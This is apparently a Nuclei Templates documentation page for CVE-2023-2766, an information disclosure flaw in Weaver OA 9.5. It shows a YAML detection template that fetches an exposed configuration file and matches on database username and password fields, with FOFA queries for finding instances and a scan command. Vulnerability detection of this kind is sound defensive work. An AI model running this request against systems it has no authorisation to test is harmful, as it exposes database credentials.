Skip to content
Nuclei Templates

Weaver OA 9.5 - Information Disclosure

ID: CVE-2023-2766

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2023,weaver,eoffice,exposure

Description

Section titled “Description”

A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.

YAML Source

Section titled “YAML Source”
id: CVE-2023-2766


info:
  name: Weaver OA 9.5 - Information Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    A vulnerability was found in Weaver OA 9.5 and classified as problematic. This issue affects some unknown processing of the file /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini. The manipulation leads to files or directories accessible. The attack may be initiated remotely.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  reference:
    - https://github.com/8079048q/cve/blob/main/weaveroa.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2766
    - https://vuldb.com/?ctiid.229271
    - https://vuldb.com/?id.229271
    - https://github.com/Vme18000yuan/FreePOC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-2766
    cwe-id: CWE-552
    epss-score: 0.05996
    epss-percentile: 0.93472
    cpe: cpe:2.3:a:weaver:weaver_office_automation:9.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: weaver
    product: weaver_office_automation
    fofa-query:
      - app="泛微-EOffice"
      - app="泛微-eoffice"
  tags: cve,cve2023,weaver,eoffice,exposure


http:
  - method: GET
    path:
      - "{{BaseURL}}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini"


    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header,"text/plain")'
          - 'contains_all(body, "sdbuser =","sdbpassword =")'
        condition: and
# digest: 4a0a00473045022056b0257a1d3aee7f980058d51ee8cab30b4149ea6739757aac2115009f2555fd022100c4a8d6c5dd371b838a7b27a5a4306365c902ed97258f8ef182619d42f1661124:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-2766.yaml"

View on Github